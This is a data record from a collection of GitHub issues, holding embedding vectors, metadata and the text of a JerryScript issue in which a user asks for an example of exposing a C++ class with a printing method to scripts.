-0.006476034875959158, -0.0061714863404631615, -0.006311508826911449, -0.01904304325580597, 0.002109087072312832, 0.002336623379960656, -0.010872737504541874, 0.010494677349925041, -0.01103376317769289, 0.012833050452172756, 0.0013407142832875252, -0.021297402679920197, 0.011747877113521099, -0.014324288815259933, -0.01114578079432249, 0.010760719887912273, 0.022711629047989845, -0.006052467040717602, -0.010935747995972633, -0.004389701411128044, -0.010431666858494282, -0.0026009157299995422, 0.0049042836762964725, -0.012181947007775307, -0.024783961474895477, -0.01904304325580597, -0.015164423733949661, 0.024783961474895477, 0.03214913606643677, -0.012090932577848434, -0.008975434117019176, -0.009458511136472225, 0.008478354662656784, 0.02895662747323513, -0.010529682971537113, 0.003546066815033555, -0.007960272021591663, -0.015388458967208862, 0.018762998282909393, 0.006521542090922594, -0.008604374714195728, 0.00452622352167964, -0.017460789531469345, 0.009472513571381569, -0.004452711436897516, 0.0013013329589739442, 0.018889019265770912, 0.009682547301054, 0.004564729519188404, 0.028074486181139946, 0.0012943318579345942, -0.019673144444823265, -0.025498075410723686, 0.01197891402989626, 0.019673144444823265, 0.015024401247501373, -0.0024976490531116724, -0.011600853875279427, 0.001140307285822928, -0.004575231112539768, -0.00636751763522625, -0.01184589322656393, -0.002343624597415328, -0.013512159697711468, -0.002172097098082304, 0.006090973503887653, -0.016872696578502655, 0.01776883937418461, 0.01197891402989626, -0.0016093822196125984, 0.010123617947101593, 0.010263640433549881, -0.017362775281071663, 0.023145699873566628, -0.009472513571381569, 0.00227536354213953, 0.004715253598988056, -0.0024608932435512543, -0.007260160055011511, -0.01547247264534235, -0.0027339369989931583, -0.020639298483729362, 0.009213472716510296, -0.017810845747590065, -0.004155164118856192, 0.0038611169438809156, 0.0084713539108634, 0.013099092990159988, 0.014912383630871773, 0.012623017653822899, 0.03811408951878548, 0.000013735593711317051, 0.0020985854789614677, 0.01207693014293909, 0.010725714266300201, -0.005352355539798737, -0.005527383182197809, 0.00009019410208566114, -0.016844691708683968, 0.006504039280116558, 0.011180786415934563, -0.00030432987841777503, -0.00910845585167408, -0.012665024027228355, -0.000535148021299392, 0.009682547301054, 0.028872614726424217, -0.022445587441325188, 0.004627739544957876, -0.0168306902050972, 0.013561166822910309, 0.00674557825550437, 0.009836572222411633, -0.003460302948951721, -0.016606653109192848, 0.015850532799959183, -0.011313808150589466, -0.008919425308704376, -0.03156104311347008, 0.01961713470518589, -0.006808588281273842, 0.025652099400758743, -0.0049392892979085445, 0.005663905292749405, 0.03259721025824547, -0.005345354322344065, -0.007470193784683943, -0.017936866730451584, 0.006528543308377266, -0.005334852728992701, 0.01692870631814003, 0.0007346799247898161, 0.0037946063093841076, -0.0023418741766363382, 0.003047236939892173, 0.003218764439225197, 0.014107254333794117, 0.003927627578377724, 0.00625199917703867, 0.001183189102448523, -0.010823729448020458, 0.007631219457834959, 0.009794564917683601, -0.021073367446660995, -0.002476645866408944, -0.010263640433549881, 0.011607854627072811, 0.0038716187700629234, 0.027122333645820618, 0.006766581442207098, -0.030216829851269722, -0.004267181735485792, -0.02311769500374794, -0.00645503168925643, -0.0015778772067278624, -0.0038506153505295515, 0.0017161492723971605, 0.0127910440787673, -0.010585691779851913, 0.0029037140775471926, 0.008023282513022423, -0.008632379584014416, -0.003612577449530363, 0.021801484748721123, 0.012742036022245884, 0.013344132341444492, 0.009591532871127129, -0.007918265648186207, 0.02582012675702572, 0.02159145101904869, -0.00017054287309292704, -0.018847012892365456, -0.016886698082089424, 0.01256000716239214, 0.016648661345243454, 0.004823770839720964, -0.024209868162870407, 0.015318447723984718, -0.007067629601806402, 0.0018290423322468996, 0.00910845585167408, -0.014828369952738285, 0.019673144444823265, 0.002322621177881956, -0.00829632580280304, -0.027598410844802856, 0.00245039165019989, -0.003029734129086137, 0.015500477515161037, 0.014450309798121452, -0.03993438184261322, -0.00628000358119607, 0.024937985464930534, 0.001109677366912365, -0.0050793117843568325, -0.027388377115130424, 0.007540205027908087, -0.012482995167374611, 0.0030139817390590906, 0.01646663248538971, -0.02185749262571335, -0.012048925273120403, 0.0004423831996973604, -0.0029334689024835825, 0.0020635798573493958, -0.008037284016609192, -0.008331331424415112, 0.00011562785221030936, 0.0035705706104636192, 0.018160901963710785, -0.005296346265822649, 0.00659855455160141, -0.018622975796461105, 0.006689568981528282, -0.00014560139970853925, -0.0027426884043961763, 0.015962550416588783, -0.01715274155139923, -0.03178507834672928, 0.004312689416110516, 0.0062940060161054134, 0.00781324878334999, 0.016382617875933647, 0.003236267250031233, -0.008506359532475471, 0.0026114173233509064, -0.001176188001409173, 0.00229111616499722, -0.005845934152603149, -0.006728075444698334, 0.013414143584668636, 0.01173387560993433, 0.020471271127462387, -0.0015358704840764403, 0.039654336869716644, -0.010543685406446457, -0.00046207383275032043, 0.014856373891234398, -0.0038506153505295515, -0.00630800798535347, -0.0029247174970805645, -0.011810887604951859, 0.008884419687092304, -0.0245039165019989, -0.013554166071116924, 0.002287615556269884, -0.015374457463622093, -0.017096731811761856, 0.0062765032052993774, 0.00975955929607153, -0.00835233461111784, -0.00789026077836752, 0.014366296119987965, 0.001264577149413526, -0.011159783229231834, 0.0006515416316688061, 0.01750279776751995, -0.018062885850667953, 0.03618178144097328, -0.01314110029488802, -0.00645153084769845, 0.011124777607619762, -0.015612495131790638, -0.005156324245035648, 0.01599055528640747, 0.012293964624404907, -0.016018560156226158, 0.0024521418381482363, 0.0018657981418073177, -0.011054766364395618, 0.038926221430301666, -0.0058039273135364056, 0.02076531946659088, 0.014744356274604797, -0.010242637246847153, 0.008954430930316448, 0.0007836877484805882, 0.020107213407754898, -0.00645503168925643, -0.0017214000690728426, 0.006199490744620562, -0.00510381581261754, 0.006062969099730253, 0.004102655686438084, -0.0016715171514078975, -0.011341813020408154, 0.008128299377858639, -0.003962633199989796, -0.014142259955406189, 0.02276763878762722, -0.015262438915669918, -0.012994077056646347, 0.02089133858680725, 0.002285865368321538, -0.009654543362557888, 0.0031207487918436527, -0.027150338515639305, 0.003299277275800705, 0.00633601238951087, -0.005625398829579353, 0.003980136010795832, 0.008576370775699615, 0.01045967172831297, -0.007330171298235655, 0.0038506153505295515, -0.004113157279789448, 0.006987116765230894, 0.007015121169388294, -0.022151540964841843, -0.016648661345243454, -0.011488836258649826, -0.030328847467899323, 0.005467873997986317, 0.003232766641303897, -0.009717552922666073, -0.012363975867629051, 0.007589212618768215, -0.013351134024560452, -0.013498157262802124, 0.00017754400323610753, 0.023551763966679573, -0.010067609138786793, -0.004778263624757528, 0.008093293756246567, -0.01003260351717472, -0.026338208466768265, -0.009696549735963345, 0.0084713539108634, 0.02205352485179901, -0.014814367517828941, -0.018398940563201904, -0.013813207857310772, -0.015612495131790638, 0.00025991653092205524, -0.007701230701059103, -0.0001831230183597654, -0.020961349830031395, 0.028200507164001465, 0.016732674092054367, 0.024349890649318695, 0.004361697006970644, 0.009157463908195496, -0.01015162281692028, 0.0029877275228500366, 0.023537762463092804, 0.013862214982509613, 0.027514396235346794, -0.018384939059615135, -0.01371519174426794, -0.009542524814605713, -0.0042636813595891, 0.023033680394291878, -0.006805087439715862, 0.04435908794403076, -0.01331612840294838, -0.009297485463321209, -0.0003448050993029028, -0.02100335620343685, -0.017138738185167313, 0.012693028897047043, -0.006637060549110174, 0.020275240764021873, -0.022361572831869125, -0.006514540873467922, -0.0019760658033192158, -0.0025974151212722063, -0.02313169650733471, -0.014135259203612804, 0.022039521485567093, -0.01155184581875801, -0.01774083450436592, -0.0019463110947981477, 0.005971954204142094, -0.01506640762090683, -0.012756038457155228, -0.001174437697045505, 0.01470234990119934, 0.0068961018696427345, 0.014450309798121452, -0.01799287460744381, 0.01753080077469349, 0.008478354662656784, 0.022109532728791237, -0.0029474711045622826, 0.005380359943956137, 0.012931066565215588, -0.010228634811937809, -0.020947348326444626, -0.015934547409415245, -0.018370935693383217, 0.021997515112161636, -0.005002299323678017, 0.010172626003623009, 0.011285803280770779, 0.01132080890238285, 0.0023418741766363382, -0.0003905311750713736, -0.009577530436217785, 0.006619557738304138, 0.011929906904697418, -0.005313849076628685, 0.005527383182197809, -0.008905422873795033, -0.01950511708855629, -0.030916940420866013, -0.017544804140925407, -0.008170305751264095, 0.01547247264534235, 0.004442209843546152, 0.025610093027353287, 0.02125539630651474, -0.006406023632735014, 0.0037771037314087152, 0.011292804963886738, 0.010473674163222313, 0.005562388803809881, 0.03629380092024803, 0.006696570198982954, 0.00816330499947071, -0.0038751193787902594, 0.00864638201892376, -0.005817929748445749, 0.001126304967328906, 0.024545922875404358, 0.0013153351610526443, -0.003421796951442957, 0.008555367588996887, -0.016620656475424767, -0.00041372235864400864, -0.00789026077836752, 0.0308329276740551, 0.003259020857512951, -0.003626579651609063, 0.014338291250169277, 0.016438627615571022, 0.010193629190325737, 0.01178988441824913, -0.008947430178523064, -0.004337192978709936, 0.00735117495059967, 0.018819008022546768, -0.001202442217618227, 0.0016540143406018615, 0.034165460616350174, -0.0019113054731860757, -0.007974274456501007, -0.00035661947913467884, 0.014800365082919598, 0.005516881588846445, 0.0027584407944232225, -0.0031960108317434788, 0.00806528888642788, 0.03049687296152115, 0.018987033516168594, -0.014016239903867245, -0.015668503940105438, 0.0036825884599238634, -0.006160984747111797, -0.005810928530991077, -0.008009280078113079, -0.008324330672621727, -0.02310369163751602, -0.030412860214710236, -0.004270682577043772, 0.010956751182675362, 0.01034065242856741, -0.0026429223362356424, -0.03254120051860809, -0.006332512013614178, 0.020387258380651474, 0.01167086511850357, -0.014142259955406189, -0.03839413449168205, -0.011418825015425682, 0.004190169740468264, 0.007883260026574135, -0.028186503797769547, 0.0037806041073054075, 0.008009280078113079, 0.011887899599969387, 0.019673144444823265, 0.020023200660943985, 0.004368698224425316, -0.016410622745752335, -0.022235553711652756, 0.010963751934468746, -0.0050968145951628685, 0.0063920216634869576, 0.01562649756669998, 0.010025601834058762, -0.023663781583309174, 0.005915945395827293, -0.009717552922666073, 0.008667385205626488, 0.00939550157636404, 0.014100253582000732, 0.003521562786772847, 0.017096731811761856, -0.007428186945617199, 0.023901820182800293, 0.006938108708709478, -0.012833050452172756, -0.019701149314641953, -0.01319710910320282, 0.0019008037634193897, -0.011187788099050522, -0.02068130485713482, 0.0019358093850314617, -0.004211172927170992, -0.004225175362080336, 0.005471374373883009, 0.009241476655006409, -0.012489995919167995, -0.01265802327543497, 0.0225296001881361, 0.021157382056117058, 0.00735117495059967, -0.012342972680926323, -0.00680158706381917, -0.010578691028058529, 0.003152253804728389, 0.004337192978709936, 0.001293456763960421, 0.017138738185167313, 0.012833050452172756, -0.004568229895085096, 0.0008326955721713603, 0.010942748747766018, -0.027178343385457993, 0.005737416911870241, -0.007834251970052719, -0.0028984632808715105, -0.004946290515363216, -0.011047765612602234, -0.0047012511640787125, -0.010585691779851913, 0.0016426375368610024, -0.000009824811968428548, -0.005177327431738377, -0.0012479494325816631, -0.0007254909141920507, -0.02685629203915596, 0.00013641241821460426, 0.0005920320982113481, 0.009780563414096832, 0.003425297327339649, 0.01704072393476963, 0.026226190850138664, 0.0007097384077496827, -0.013204109854996204, -0.008604374714195728, -0.015500477515161037, 0.003327281679958105, -0.04458312317728996, -0.004946290515363216, 0.02929268218576908, -0.0005522132269106805, 0.008044285699725151, 0.003913625609129667, 0.001200691913254559, -0.006553047336637974, -0.013351134024560452, 0.00816330499947071, 0.009598533622920513, -0.004739757627248764, -0.006381520070135593, -0.003087493358179927, 0.007302166894078255, 0.01536045502871275, -0.004662745166569948, 0.048279717564582825, -0.026590248569846153, 0.029040640220046043, 0.004837773274630308, -0.012279962189495564, 0.0037350968923419714, 0.00009276482160203159, 0.011474833823740482, 0.02149343490600586, 0.018132897093892097, 0.01961713470518589, -0.010158623568713665, 0.0002995166287291795, -0.007435188163071871, -0.020807325839996338, -0.015710510313510895, 0.003350035287439823, -0.006273002363741398, -0.013155102729797363, -0.002035575220361352, -0.00105104292742908, -0.003229266032576561, 0.025834128260612488, 0.006185488309711218, -0.007281163707375526, 0.002453892258927226, 0.01558449026197195, -0.02054128237068653, -0.006020962260663509, -0.024237873032689095, 0.03046886995434761, 0.007330171298235655, -0.00735117495059967, 0.005621898453682661, 0.017908861860632896, 0.010879738256335258, 0.012146941386163235, 0.012188947759568691, -0.0032397678587585688, -0.005761920940130949, -0.0008747022948227823, 0.009213472716510296, -0.01547247264534235, -0.009773561730980873, -0.004778263624757528, -0.009066448546946049, 0.0013039583573117852, -0.012777041643857956, 0.020835328847169876, 0.03749799355864525, 0.018076889216899872, 0.006808588281273842, -0.0004185356374364346, 0.013680186122655869, -0.009332491084933281, 0.0014063497073948383, 0.015192427672445774, 0.0008108170586638153, -0.021997515112161636, -0.009899581782519817, -0.01501039881259203, -0.013015080243349075, -0.007039625197649002, -0.0005277093150652945, -0.014093251898884773, 0.004375699441879988, 0.012763040140271187, 0.019995195791125298, -0.0202192310243845, 0.026310205459594727, -0.01062769815325737, -0.0024346390273422003, -0.01541646383702755, -0.0005075811059214175, 0.008058288134634495, -0.006805087439715862, -0.0012243206147104502, -0.007834251970052719, 0.0028862112667411566, 0.0003078304580412805, -0.015206430107355118, -0.017250757664442062, 0.010235635563731194, -0.014926385134458542, -0.012609015218913555, -0.010501678101718426, -0.006556547712534666, 0.0038296119309961796, 0.0010405413340777159, 0.016788683831691742, 0.02383180893957615, 0.001050167833454907, -0.005527383182197809, 0.0004918285994790494, 0.025988154113292694, -0.01751679927110672, -0.00492878770455718, -0.00008012999023776501, 0.002586913527920842, 0.023649780079722404, 0.007288164924830198, 0.0028879614546895027, -0.02100335620343685, -0.0014518570387735963, 0.004722254816442728, 0.003609076840803027, 0.026590248569846153, 0.001960313180461526, 0.005516881588846445, 0.010417664423584938, 0.01600455865263939, -0.0037841047160327435, -0.006672066170722246, 0.0000962106860242784, 0.0018342931289225817, -0.031813085079193115, -0.001124554662965238, -0.012574009597301483, 0.013799205422401428, -0.013008078560233116, -0.005530884023755789, 0.011621857061982155, 0.002455642446875572, 0.016018560156226158, 0.02780844457447529, 0.017726833000779152, 0.01726475916802883, 0.018426945433020592, 0.004253179766237736, 0.01225195825099945, 0.012230955064296722, -0.005555388052016497, 0.016760678961873055, -0.0017887859139591455, 0.010046605952084064, -0.003274773247539997, -0.012742036022245884, -0.010270641185343266, -0.0027426884043961763, 0.009234475903213024, -0.006623058579862118, 0.043378934264183044, -0.01092174556106329, -0.004130660090595484, -0.005397862754762173, 0.00020478272926993668, 0.012167944572865963, 0.003365787910297513, 0.003250269452109933, -0.005656904075294733, 0.005513381212949753, -0.0009757809457369149, 0.016046565026044846, 0.012931066565215588, -0.001106176758185029, 0.001090424251742661, 0.00910845585167408, 0.022585609927773476, -0.005093313753604889, 0.00039687592652626336, 0.0004843899223487824, 0.011628858745098114, -0.013344132341444492, 0.018384939059615135, 0.022109532728791237, 0.014212271198630333, 0.009374498389661312, -0.0037596009206026793, 0.02838253602385521, 0.021073367446660995, -0.01879100315272808, 0.003551317611709237, -0.0007583086844533682, 0.004067650064826012, 0.010410663671791553, -0.01265802327543497, 0.007785244379192591, -0.00898943655192852, -0.007169145625084639, -0.004249678924679756, 0.016368616372346878, 0.010872737504541874, -0.022011518478393555, 0.0008068789611570537, 0.011285803280770779, -0.000531647470779717, -0.012875057756900787, 0.018020879477262497, 0.0137782022356987, 0.003318530274555087, -0.0013363385805860162, -0.023033680394291878, 0.015934547409415245, 0.0016391369281336665, -0.0191410593688488, 0.006521542090922594, 0.018062885850667953, 0.0012173195136711001, 0.025470070540905, 0.0026586749590933323, -0.0025064004585146904, 0.0007578711374662817, 0.012854054570198059, 0.03618178144097328 ]
48
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
E.g ``` class foo { public: void printxx(const char* str) { printf(str); } } ``` And in the script I can do var p_str = new foo(); p_str.printxx(‘Hello World’); **I need an example, thank you all for helping me**
How to register a C++ class to the script?
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4711/comments
1
2021-07-15T06:53:59
2022-10-13T12:55:30Z
https://github.com/jerryscript-project/jerryscript/issues/4711
945,061,608
4,711
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : How to register a C++ class to the script? Issue date: --- start body --- E.g ``` class foo { public: void printxx(const char* str) { printf(str); } } ``` And in the script I can do var p_str = new foo(); p_str.printxx(‘Hello World’); **I need an example, thank you all for helping me** --- end body ---
429
[ -0.008068752475082874, 0.015139308758080006, -0.018095504492521286, 0.010634628124535084, 0.04340873658657074, 0.020104695111513138, 0.004709438420832157, 0.050984788686037064, -0.015088118612766266, 0.0727403461933136, -0.03665171563625336, 0.026823323220014572, -0.008638235740363598, -0.018364250659942627, 0.018377047032117844, 0.020872537046670914, -0.017250876873731613, 0.013987543992698193, -0.01873537339270115, 0.018786564469337463, 0.03181430324912071, 0.01904251240193844, 0.005794016644358635, 0.020463021472096443, -0.00555406603962183, -0.0023595180828124285, 0.009790000505745411, 0.00718573248013854, -0.04832293093204498, -0.006993771996349096, 0.030227428302168846, 0.020616590976715088, -0.029997074976563454, -0.02043742686510086, 0.03808502480387688, -0.007409687153995037, 0.02536442130804062, 0.007307307794690132, -0.03839216008782387, -0.033170826733112335, 0.02556917816400528, -0.00008663230983074754, 0.013034138828516006, -0.01593274623155594, 0.01955440640449524, 0.06362860649824142, 0.025070080533623695, 0.0196823813021183, 0.0005730830016545951, -0.019426433369517326, 0.005893196444958448, -0.03107205592095852, 0.028589362278580666, -0.04015820100903511, 0.00032593344803899527, -0.0253900159150362, 0.018197884783148766, -0.02669534832239151, -0.0027130460366606712, -0.017250876873731613, 0.012055138126015663, -0.002225145697593689, 0.01533126924186945, -0.01150485035032034, 0.011460060253739357, 0.07458317279815674, -0.04169388487935066, 0.02690010704100132, 0.01728926971554756, 0.005842007230967283, 0.04100282862782478, 0.014960145577788353, 0.02945958450436592, 0.02174275927245617, 0.01186317764222622, 0.01151764765381813, -0.019324054941534996, 0.04328076168894768, 0.00202998542226851, -0.0018956129206344485, 0.007550458423793316, 0.001842823694460094, -0.0057172323577106, -0.0072817131876945496, -0.016431843861937523, -0.012874171137809753, -0.01876096986234188, -0.04302481561899185, -0.0026026684790849686, 0.03350355848670006, 0.002746639074757695, 0.03962070867419243, 0.029920291155576706, 0.00236271764151752, -0.010231510736048222, 0.0008254314307123423, -0.0036920460406690836, -0.00986038614064455, -0.029178041964769363, 0.026567375287413597, 0.06751900911331177, 0.06347503513097763, -0.005810013506561518, -0.03288928419351578, 0.0046646473929286, 0.031558357179164886, 0.02966434322297573, -0.034399375319480896, 0.0030345802661031485, 0.0213332436978817, 0.021832341328263283, -0.007736020255833864, -0.03311963751912117, 0.012586229480803013, 0.00751846469938755, 0.053953781723976135, -0.008414281532168388, -0.051189545542001724, -0.009662027470767498, 0.00473503302782774, -0.008516660891473293, -0.011837583035230637, -0.0040471735410392284, -0.0275143813341856, -0.048246148973703384, 0.034092240035533905, 0.0013685205485671759, 0.008222321048378944, 0.014653007499873638, 0.009764405898749828, -0.026772134006023407, -0.06511310487985611, 0.003455294528976083, -0.016866955906152725, 0.005086961202323437, 0.029613152146339417, -0.017033321782946587, 0.027053676545619965, -0.011594432406127453, -0.07499268651008606, -0.0004699040437117219, -0.012304686941206455, -0.0035704709589481354, -0.0165726151317358, -0.02293291687965393, -0.002884211018681526, 0.003256934927776456, 0.02098771370947361, -0.01832585781812668, -0.006533065810799599, 0.0037688303273171186, -0.009143732488155365, 0.02440461702644825, 0.004517477471381426, -0.006699432153254747, 0.007627242710441351, -0.012074334546923637, 0.02532602846622467, -0.001259742770344019, 0.036523740738630295, -0.03158394992351532, -0.07642599195241928, -0.029178041964769363, 0.007006569299846888, -0.04015820100903511, 0.012509445659816265, 0.014857766218483448, 0.04197542741894722, -0.031558357179164886, 0.0015468840720131993, -0.014089922420680523, -0.002210748614743352, 0.06342384964227676, 0.022843334823846817, -0.05897035822272301, 0.014985740184783936, -0.005333310924470425, -0.007889589294791222, 0.012272694148123264, -0.024532590061426163, 0.04425336420536041, 0.04384384676814079, -0.008516660891473293, 0.002549879252910614, -0.028077466413378716, 0.01533126924186945, 0.020859740674495697, -0.0068530007265508175, 0.025300433859229088, -0.032454174011945724, 0.0006562659982591867, 0.03199346736073494, 0.00849106628447771, -0.017685988917946815, 0.04084925726056099, 0.0101355304941535, -0.01845383085310459, -0.028359008952975273, -0.026541780680418015, 0.02013028971850872, 0.007121745962649584, -0.04433014616370201, -0.011370478197932243, -0.07320105284452438, -0.050088971853256226, -0.029126852750778198, 0.002444300800561905, -0.03230060264468193, 0.018824955448508263, 0.020002314820885658, 0.0048758042976260185, 0.04215459153056145, 0.015164903365075588, -0.04512358456850052, -0.00043991015991196036, -0.013309282250702381, 0.03647255152463913, 0.023662367835640907, -0.017916342243552208, -0.05999414995312691, 0.005534869618713856, -0.04136115312576294, 0.0005902794655412436, -0.010864981450140476, -0.053544268012046814, -0.0027002485003322363, -0.025927506387233734, 0.00405997084453702, 0.005138150881975889, 0.027667950838804245, 0.03222382068634033, -0.0032921277452260256, -0.012496648356318474, 0.012861373834311962, 0.037854671478271484, 0.011197713203728199, 0.005173343699425459, -0.004632654134184122, -0.003976787906140089, 0.022945715114474297, 0.00998196192085743, 0.0006526667275466025, -0.03506483882665634, 0.010916170664131641, -0.0012357477098703384, 0.026234643533825874, -0.002055580262094736, -0.04151472449302673, 0.023329636082053185, -0.007140941917896271, 0.00952125620096922, 0.00604996457695961, 0.023163270205259323, -0.023841531947255135, 0.011677615344524384, 0.01873537339270115, -0.008747014217078686, 0.021282054483890533, 0.013462850823998451, -0.012567033991217613, -0.0005694837309420109, 0.021410027518868446, -0.014537831768393517, -0.010365882888436317, -0.003852013498544693, -0.028973283246159554, -0.004907798022031784, -0.03997903689742088, 0.01910649798810482, -0.0014357068575918674, 0.014038733206689358, -0.046300943940877914, 0.031737517565488815, 0.05794656649231911, -0.019119296222925186, 0.0026026684790849686, -0.0032345394138246775, 0.02679772861301899, 0.000028144253519712947, 0.010103536769747734, -0.014755386859178543, 0.049679454416036606, 0.02467336133122444, 0.03452735021710396, 0.006661039777100086, -0.04799019917845726, -0.0394415445625782, -0.014230693690478802, -0.01869698241353035, 0.02153800241649151, -0.021755557507276535, -0.02984350547194481, -0.013398864306509495, -0.00769762834534049, 0.04607059061527252, 0.023713557049632072, -0.003236139193177223, -0.018172288313508034, 0.022472212091088295, 0.026720942929387093, 0.01965678669512272, -0.053134750574827194, 0.006190735846757889, 0.008574249222874641, -0.00006443684105761349, 0.04013260453939438, 0.03803383186459541, 0.016892550513148308, 0.02583792433142662, 0.003963990602642298, 0.02986910007894039, -0.015088118612766266, -0.03882727026939392, 0.011594432406127453, -0.03596065565943718, 0.03281249850988388, 0.051010385155677795, 0.011754400096833706, -0.044893231242895126, -0.003711242228746414, -0.02344481274485588, -0.026464994996786118, -0.05978938937187195, 0.0031993465963751078, 0.036933258175849915, 0.03273571655154228, -0.03772669658064842, -0.008529458194971085, 0.006161941681057215, 0.0165726151317358, 0.0013693204382434487, -0.04330635815858841, -0.011850380338728428, 0.017622001469135284, -0.034808892756700516, -0.04138674959540367, -0.05595017597079277, 0.03342677280306816, 0.013565230183303356, -0.023700760677456856, -0.014141112565994263, 0.008683026768267155, -0.0014948947355151176, 0.007684830576181412, 0.026567375287413597, -0.030406590551137924, -0.005093359854072332, 0.03639576956629753, 0.019324054941534996, 0.035320788621902466, 0.0006930584786459804, 0.014742589555680752, 0.037138015031814575, 0.008401484228670597, 0.01420509908348322, -0.02109009400010109, 0.006712229456752539, -0.040004629641771317, 0.00653626536950469, 0.005714033264666796, 0.005061366595327854, -0.0150369293987751, -0.008375889621675014, 0.001243746024556458, 0.012426262721419334, -0.02084694243967533, -0.008535857312381268, -0.007832000963389874, -0.0446372851729393, -0.011114530265331268, -0.02023266814649105, 0.006331507116556168, 0.010634628124535084, -0.010225111618638039, -0.009066948667168617, -0.004245533142238855, -0.004255130887031555, 0.022408224642276764, 0.004194343462586403, 0.01794193685054779, 0.02963874861598015, -0.004565467592328787, -0.006309111602604389, -0.032147035002708435, 0.005176542792469263, -0.010321092791855335, -0.01781396195292473, 0.013501242734491825, -0.015804773196578026, -0.020219871774315834, -0.031737517565488815, 0.013897961936891079, -0.020718969404697418, 0.005509275011718273, -0.00006923585897311568, 0.014844968914985657, -0.008503863587975502, -0.06076199188828468, 0.008318301290273666, -0.003947993740439415, -0.023905519396066666, -0.029101258143782616, 0.026439400389790535, -0.020015113055706024, -0.0101355304941535, -0.03148157149553299, 0.011831183917820454, -0.026516186073422432, -0.006469078827649355, 0.022497806698083878, -0.013501242734491825, -0.050984788686037064, -0.0011269698152318597, 0.03038099594414234, 0.04412538930773735, 0.003487287787720561, -0.007121745962649584, 0.021576393395662308, 0.00616834033280611, 0.017698785290122032, 0.04371587187051773, -0.0529811829328537, -0.015676798298954964, -0.006065961439162493, -0.02720724418759346, 0.03493686765432358, -0.003165753558278084, 0.01291896216571331, -0.0071281446143984795, -0.024148669093847275, -0.06987373530864716, -0.013782785274088383, -0.011300092563033104, 0.03818740323185921, 0.023470407351851463, -0.024251047521829605, 0.006043565925210714, -0.021410027518868446, -0.01568959653377533, 0.011472857557237148, -0.01533126924186945, 0.01767319068312645, 0.005544467829167843, -0.039492733776569366, -0.015203295275568962, 0.006011572666466236, -0.05799775570631027, -0.03232619911432266, -0.007012967951595783, 0.00769762834534049, 0.01314291637390852, -0.015062524005770683, -0.04545631632208824, -0.00040111810085363686, -0.014640210196375847, 0.006369899492710829, -0.05054967850446701, 0.02902447246015072, 0.022984106093645096, -0.028384603559970856, -0.008753412403166294, -0.027693545445799828, -0.0078128045424819, 0.021320445463061333, -0.03483448550105095, 0.030406590551137924, 0.009745210409164429, -0.005061366595327854, -0.009937170892953873, -0.006001974456012249, 0.0013069331180304289, 0.013859570026397705, 0.016930943354964256, 0.005496477708220482, -0.009354889392852783, 0.0014221095480024815, 0.012605425901710987, -0.01300854329019785, 0.029382800683379173, -0.02792389877140522, -0.01671338640153408, -0.041489128023386, -0.07043682038784027, 0.04330635815858841, 0.02385432831943035, -0.034271400421857834, 0.038366567343473434, 0.0196823813021183, 0.032121442258358, 0.029817910864949226, 0.024762943387031555, 0.012259896844625473, 0.000018021319192484953, -0.05165025219321251, 0.005285320803523064, 0.020923728123307228, -0.014294681139290333, -0.004255130887031555, 0.050856813788414, -0.01644464209675789, 0.012343079783022404, -0.012003948912024498, 0.027130460366606712, 0.0331452302634716, 0.02125645987689495, 0.011767197400331497, -0.03839216008782387, 0.015318471938371658, -0.03401545435190201, 0.015113714151084423, 0.014998537488281727, -0.03509043529629707, -0.015945544466376305, -0.012451857328414917, -0.017788367345929146, -0.03596065565943718, -0.025108473375439644, 0.026541780680418015, 0.036728501319885254, -0.01873537339270115, -0.014985740184783936, -0.024417413398623466, -0.017007727175951004, -0.0071281446143984795, 0.01066662184894085, 0.012586229480803013, 0.01585596241056919, -0.017865151166915894, -0.03483448550105095, -0.01736605353653431, -0.013462850823998451, -0.004335114732384682, 0.0019883939530700445, 0.027028080075979233, -0.0006506671197712421, -0.01845383085310459, -0.008484667167067528, 0.01539525669068098, 0.004587863106280565, -0.01121051050722599, -0.006062761880457401, 0.025786735117435455, -0.023304041475057602, -0.00608515739440918, 0.021486813202500343, 0.0025882713962346315, -0.010481059551239014, 0.0002219546731794253, -0.022229060530662537, 0.03268452733755112, -0.031123245134949684, 0.0192472692579031, 0.008842994458973408, 0.029894694685935974, -0.0035096833016723394, -0.0374707467854023, -0.000523093156516552, -0.0005694837309420109, -0.034296996891498566, -0.010602635331451893, 0.007800007238984108, -0.012758994475007057, -0.0034936866723001003, -0.008983765728771687, -0.028666146099567413, -0.027284028008580208, 0.005666043143719435, 0.03230060264468193, -0.03567911311984062, 0.01828746497631073, 0.02833341434597969, 0.003653653897345066, 0.023559989407658577, -0.0035992651246488094, 0.00567244179546833, 0.011152922175824642, 0.026106668636202812, 0.0038168206810951233, -0.00736489612609148, 0.008299104869365692, 0.027667950838804245, 0.009853987954556942, -0.012394268997013569, 0.019285662099719048, -0.013526838272809982, 0.010103536769747734, -0.004293523263186216, -0.02450699545443058, -0.017442837357521057, -0.04102842137217522, -0.027667950838804245, -0.022945715114474297, -0.026976890861988068, 0.00371764088049531, 0.021269256249070168, -0.009361288510262966, -0.013936353847384453, -0.006497872993350029, 0.025607571005821228, -0.017506824806332588, 0.021512407809495926, -0.013334876857697964, 0.011223307810723782, -0.04102842137217522, -0.02160198800265789, 0.000813433900475502, 0.023419218137860298, -0.03148157149553299, -0.003922399133443832, 0.0075568570755422115, -0.045072395354509354, 0.0021707566920667887, 0.04159150645136833, -0.01961839385330677, -0.002442701254040003, 0.011428066529333591, -0.016866955906152725, 0.019541610032320023, -0.013565230183303356, 0.006209931802004576, 0.023496001958847046, -0.019119296222925186, -0.002221946371719241, -0.012125523760914803, -0.0024682958610355854, 0.03885286673903465, 0.00825431477278471, -0.010609033517539501, -0.008990163914859295, -0.029613152146339417, 0.01869698241353035, -0.022740956395864487, -0.015292877331376076, 0.004859807435423136, -0.016726184636354446, 0.01863299496471882, 0.018927335739135742, 0.010097138583660126, -0.018338656052947044, -0.014857766218483448, -0.01421789638698101, -0.007646438665688038, -0.015971139073371887, 0.029689937829971313, -0.013386067003011703, 0.003669650759547949, -0.02933160960674286, -0.0021867535542696714, 0.0062739187851548195, -0.004165549296885729, 0.0009734012419357896, -0.008932575583457947, -0.016393452882766724, -0.002501889131963253, -0.007915183901786804, 0.0031497569289058447, 0.027847113087773323, 0.00797917041927576, -0.02871733531355858, -0.02197311259806156, -0.036523740738630295, -0.026618564501404762, 0.018914537504315376, 0.007179333828389645, 0.028461387380957603, -0.015254485420882702, 0.0038776081055402756, 0.0012501446763053536, 